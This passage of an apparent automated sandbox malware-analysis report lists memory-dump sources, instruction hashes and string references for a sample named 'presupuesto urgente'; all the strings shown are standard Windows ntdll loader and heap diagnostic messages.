                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                      • API String ID: 0-3061284088
                                                                                                                                                      • Opcode ID: 8560520edfcc43ed03dfcc7839ac028dce12160b7d561f60d4f5ceaa0ccb606f
                                                                                                                                                      • Instruction ID: d71ac50dd3319593a525a8c5580c03c4da2651a81cdce60320f7c67ac48d549d
                                                                                                                                                      • Opcode Fuzzy Hash: 8560520edfcc43ed03dfcc7839ac028dce12160b7d561f60d4f5ceaa0ccb606f
                                                                                                                                                      • Instruction Fuzzy Hash: 90014C36516640EFE3059729F41CF427BB4DF81774F594889F050DB9D28A96D840DD50
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                      • API String ID: 0-379654539
                                                                                                                                                      • Opcode ID: f72ec31eb755e0b687986efd8735b62c6f1a57bd2ceb1ddaf4a1011de78048b5
                                                                                                                                                      • Instruction ID: c9f780b670d3aee48c67eaf3fac8b0db076d329fc4e6fd0018bea1c9d9a73d2e
                                                                                                                                                      • Opcode Fuzzy Hash: f72ec31eb755e0b687986efd8735b62c6f1a57bd2ceb1ddaf4a1011de78048b5
                                                                                                                                                      • Instruction Fuzzy Hash: D1C1A975109386CFE711CF68E040B9AB7F4BF86764F44896AF885CB290E734C94ACB52
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpInitializeProcess, xrefs: 33568342
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 33568341
                                                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3356847E
                                                                                                                                                      • @, xrefs: 335684B1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-1918872054
                                                                                                                                                      Strings
                                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 335A1FE8
                                                                                                                                                      • .Local, xrefs: 335627F8
                                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 335A20C0
                                                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 335A1FE3, 335A20BB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                      • API String ID: 0-1239276146
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}Q3
                                                                                                                                                      • API String ID: 0-3024287029
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LUP3$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                      • API String ID: 0-1022177299
                                                                                                                                                      Strings
                                                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33590E2F
                                                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33590E72
                                                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33590EB5
                                                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33590DEC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                      • API String ID: 0-1468400865
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                      • API String ID: 0-2586055223
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                      • API String ID: 0-1391187441
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eV3
                                                                                                                                                      • API String ID: 0-2982544236
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                      • API String ID: 0-1168191160
                                                                                                                                                      • Opcode ID: c01debdad675c7c7cc4555b80c437be659342b1d2714f9e5d96eed098412eb78
                                                                                                                                                      • Instruction ID: 02c70a84866654cd5992c389a41dce47ff2241e13f5d92997c45fc1caffd6849
                                                                                                                                                      • Opcode Fuzzy Hash: c01debdad675c7c7cc4555b80c437be659342b1d2714f9e5d96eed098412eb78
                                                                                                                                                      • Instruction Fuzzy Hash: CAF18FB5A003AC8BDB20CF94ECC0BD9B3B5AF94758F4440E9D509A7240EB399E85CF95
                                                                                                                                                      Strings
                                                                                                                                                      • HEAP[%wZ]: , xrefs: 33531632
                                                                                                                                                      • HEAP: , xrefs: 335314B6
                                                                                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33531648
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-3178619729
                                                                                                                                                      • Opcode ID: 660b42d6bf2f2d56fea37fbadc522159be35bf12ae1853bb29d7b658696d4cf5
                                                                                                                                                      • Instruction ID: 70c2479cf70f5fe99bde63247dd6dc86d56b9c99125aabbd2cb5a79ae758f7ee
                                                                                                                                                      • Opcode Fuzzy Hash: 660b42d6bf2f2d56fea37fbadc522159be35bf12ae1853bb29d7b658696d4cf5
                                                                                                                                                      • Instruction Fuzzy Hash: F1E10F74A053419FE714DF78E48077ABBF5AF4A320F188969E4D6CB645EB34DA40CB50
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                      • API String ID: 0-2391371766
                                                                                                                                                      • Opcode ID: 4a2b3bdcab1ab62cbea58afac076fcc5b47514a06f8b079737d881074e74055a
                                                                                                                                                      • Instruction ID: d9fed760cc57511f39ef13d0097b145b48f014cab51cfafe5271f1b3fa9b57d3
                                                                                                                                                      • Opcode Fuzzy Hash: 4a2b3bdcab1ab62cbea58afac076fcc5b47514a06f8b079737d881074e74055a
                                                                                                                                                      • Instruction Fuzzy Hash: 45B1C475A04341AFEB11DF54E884B5BB7F8EF98750F450929FA50EB290DBB0E844CB92
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                      • API String ID: 0-2779062949
                                                                                                                                                      • Opcode ID: d43151940380359fa9aa6724520488232ed75bdd4e767022770eefd80446e106
                                                                                                                                                      • Instruction ID: 830e0e537c02c65a832eb9f839122caab19a0fdd10e9cb0e4281a0a77b0bc13d
                                                                                                                                                      • Opcode Fuzzy Hash: d43151940380359fa9aa6724520488232ed75bdd4e767022770eefd80446e106
                                                                                                                                                      • Instruction Fuzzy Hash: 7FA19B75D016689FDB21CF24DC88B9AB7B8EF44710F1105EAE908EB250DB349E84CF50
                                                                                                                                                      Strings
                                                                                                                                                      • GlobalizationUserSettings, xrefs: 3360B3B4
                                                                                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3360B3AA
                                                                                                                                                      • TargetNtPath, xrefs: 3360B3AF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                      • API String ID: 0-505981995
                                                                                                                                                      • Opcode ID: 5fe110d36091a41301223ce27cefbc3a80aec6fec3c2df4bb5b8055997ad529e
                                                                                                                                                      • Instruction ID: 5b9b34f0d774725dfada0561daff664f7f184ffeb5493453a1f2030708489fe3
                                                                                                                                                      • Opcode Fuzzy Hash: 5fe110d36091a41301223ce27cefbc3a80aec6fec3c2df4bb5b8055997ad529e
                                                                                                                                                      • Instruction Fuzzy Hash: 5D619D72D41329AFDB25DF54DC89BDABBB8EB04714F4141E9A908AB250CB74DE84CF90
                                                                                                                                                      Strings
                                                                                                                                                      • HEAP[%wZ]: , xrefs: 3358E435
                                                                                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3358E455
                                                                                                                                                      • HEAP: , xrefs: 3358E442
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                      • API String ID: 0-1340214556
                                                                                                                                                      • Opcode ID: 9ab769437d6f0c8f80385308bf7ac9b0858a89891976a37ebbe3b352d0401680
                                                                                                                                                      • Instruction ID: e3a73c644425cbf696c13412d757ab62fcb8a8b3ad0f065aa2a0d23f2c222cf6
                                                                                                                                                      • Opcode Fuzzy Hash: 9ab769437d6f0c8f80385308bf7ac9b0858a89891976a37ebbe3b352d0401680
                                                                                                                                                      • Instruction Fuzzy Hash: 83513635B40784AFE315CB64F884F8ABBF8EF44344F4845A4E980CB6A2DB74E910CB51
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 3359A3A7
                                                                                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 3359A396
                                                                                                                                                      • LdrpCompleteMapModule, xrefs: 3359A39D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                      • API String ID: 0-1676968949
                                                                                                                                                      • Opcode ID: 905b6ed9160b003b1d2e3c2dc0d436beed69252c1a7eeb874b1e94cae24b398e
                                                                                                                                                      • Instruction ID: af8f12a8265be4a8819eaf1226d4ba2fdae2e26e3c229da96e00fec5acc5e42a
                                                                                                                                                      • Opcode Fuzzy Hash: 905b6ed9160b003b1d2e3c2dc0d436beed69252c1a7eeb874b1e94cae24b398e
                                                                                                                                                      • Instruction Fuzzy Hash: 6D510174A00741DBFB11CF68E884B5A7BF4AB44754F580A96F8929B7E2DB74EA00CF50
                                                                                                                                                      Strings
                                                                                                                                                      • HEAP[%wZ]: , xrefs: 335DD792
                                                                                                                                                      • HEAP: , xrefs: 335DD79F
                                                                                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 335DD7B2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                      • API String ID: 0-3815128232
                                                                                                                                                      • Opcode ID: 20dbc53f2e416191795191036361c96b02478fac9db25b892121fc409c6cc763
                                                                                                                                                      • Instruction ID: 152ec827dfc96ab8951617ca645bace31ff3f9ab927812ca92a3126c1071a900
                                                                                                                                                      • Opcode Fuzzy Hash: 20dbc53f2e416191795191036361c96b02478fac9db25b892121fc409c6cc763
                                                                                                                                                      • Instruction Fuzzy Hash: 0C512479100350CEF360EA2EE84077277E1DF45384F954C8AE4D5CB685EA3AE847DBA1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                      • API String ID: 0-1151232445
                                                                                                                                                      • Opcode ID: 0719d594fa38c3070b6a3afd018ea450f8b73700c445425660a920439cdc2ff6
                                                                                                                                                      • Instruction ID: 63c8c3f5fb42225d11a3dc2f2bb6588c92e2fc28fadafacf9f00a87ffba14ff7
                                                                                                                                                      • Opcode Fuzzy Hash: 0719d594fa38c3070b6a3afd018ea450f8b73700c445425660a920439cdc2ff6
                                                                                                                                                      • Instruction Fuzzy Hash: 934157783013808FEB15DE1CE480B65BFF49F01348F6944AAE486CFA93DA74E845CB61
                                                                                                                                                      Strings
                                                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 3353A229
                                                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 3353A21B
                                                                                                                                                      • @SP3, xrefs: 3353A268
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @SP3$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                      • API String ID: 0-3693520180
                                                                                                                                                      Strings
                                                                                                                                                      • @, xrefs: 335BB2F0
                                                                                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 335BB2B2
                                                                                                                                                      • GlobalFlag, xrefs: 335BB30F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                      • API String ID: 0-4192008846
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 335A185B
                                                                                                                                                      • LdrpInitializeTls, xrefs: 335A1851
                                                                                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 335A184A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                      • API String ID: 0-931879808
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$@
                                                                                                                                                      • API String ID: 0-149943524
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                                                      Strings
                                                                                                                                                      • RedirectedKey, xrefs: 3360B60E
                                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3360B5C4
                                                                                                                                                      Memory Dump Source
